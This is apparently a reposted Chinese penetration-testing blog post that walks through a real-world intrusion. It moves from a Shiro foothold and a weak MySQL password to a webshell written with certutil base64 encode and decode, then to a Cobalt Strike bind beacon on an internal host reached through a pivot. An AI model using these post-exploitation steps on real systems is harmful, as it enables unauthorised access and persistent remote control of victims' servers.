✖  
登陆

还没有账号? 立即注册

忘记密码?
登陆
✖  
注册

已经有账号?马上登陆 购买邀请码

立即注册

一次不出网上线cs实战案例

首页 综合教程 正文
广告

场景

shiro打点获取10段服务器权限,在10段机器出网且已上线cs;172段不出网且反向不通10段,已通过mysql弱口令获取system权限,存在web服务。

上线过程

思路:写入webshell,通过正向马上线cs。

getshell

通过web服务获取一个web目录下的文件名:stf-login-bg.jpg

image.png

获取所有盘符

wmic logicaldisk get caption,name

image.png

通过文件名获取web目录

dir /a /s /b d:\"stf-login-bg.jpg"

image.png

根据图片URL确定D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\stf-login-bg.jpg为真实web路径,使用\可dir到此路径。

image.png

echo配合certutil写入webshell:

//base64编码shell.jsp certutil -encode shell.jsp jsp.txt //echo编码后的内容到web目录 echo xxxx >D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt //解码还原文件 certutil -decode D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\123.jsp

image.png

image.png

上线cs

新建监听器

image.png

生成正向马

image.png

image.png

通过webshell上传到目标机器并执行,使用跳板机连接,上线cs。

connect 172.20.57.122 28888

image.png

版权说明
文章采用: 《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
版权声明:本站资源来自互联网收集,仅供用于学习和交流,请勿用于商业用途。如有侵权、不妥之处,请联系客服并出示版权证明以便删除!
WordPress主题:B2美化通用子主题商业运营版
« 上一篇 07-30
搜书大师_v23.5(230502)去限制解锁VIP会员版
下一篇 » 07-30

发表评论

  • 泡泡
  • 阿呆
  • 阿鲁
  • 蛆音娘
没有更多评论了